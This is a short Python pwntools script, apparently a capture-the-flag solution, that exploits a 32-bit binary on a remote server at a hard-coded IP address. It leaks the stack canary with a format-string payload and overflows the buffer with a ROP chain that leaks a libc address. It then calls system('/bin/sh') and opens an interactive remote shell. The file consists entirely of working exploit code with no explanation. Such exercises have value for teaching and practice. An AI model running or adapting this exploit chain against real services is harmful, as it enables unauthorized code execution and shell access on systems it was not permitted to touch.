from pwn import *
from LibcSearcher import*
sh=remote('182.92.237.102',10012)
elf=ELF('./pwn')
context.arch='i386'
payload=b'a%19$p'
sh.sendline(payload)
sh.recvuntil(b'0x')
canary=int(sh.recv(4*2),16)
success('canary '+hex(canary))
leak='read'
leak_got=elf.got[leak]
puts_plt=elf.plt['puts']
call_back=0x80494E0
payload=b'a'*(136)+p32(canary)+p32(0xdead)+b'a'*(8)
payload+=p32(puts_plt)+p32(call_back)+p32(leak_got)
sh.recvuntil(b'Input')
sh.sendline(payload)
leak_add=u32(sh.recvuntil(b'\xf7')[-4:])
libc=LibcSearcher(leak,leak_add)
libcbase=leak_add-libc.dump(leak)
system=libcbase+libc.dump('system')
str_bin_sh=libcbase+libc.dump('str_bin_sh')
log.info('libcbase '+hex(libcbase))
payload=b'a'*(136)+p32(canary)+p32(0xdead)+b'a'*(8)
payload+=p32(system)+p32(call_back)+p32(str_bin_sh)
sh.recvuntil(b'Input')
sh.sendline(payload)
sh.interactive()